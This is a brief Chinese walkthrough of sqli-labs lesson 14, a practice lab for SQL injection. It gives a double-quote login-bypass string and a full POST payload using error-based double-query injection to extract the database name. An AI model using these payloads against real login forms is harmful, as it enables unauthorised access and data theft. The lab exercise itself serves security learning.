sqli-labs练习（十四）--- POST-Double Injection-Single quotes-String-with twist

这一关与上一关很相似，唯一的区别就在于是采用双引号来闭合的，
直接可以用万能密码成功登录，比如123" or 1=1#
在获取数据库信息是把')替换为"即可。
payload：uname=123" union select count(*),concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a#&passwd=111&submit=Submit，得到数据库名security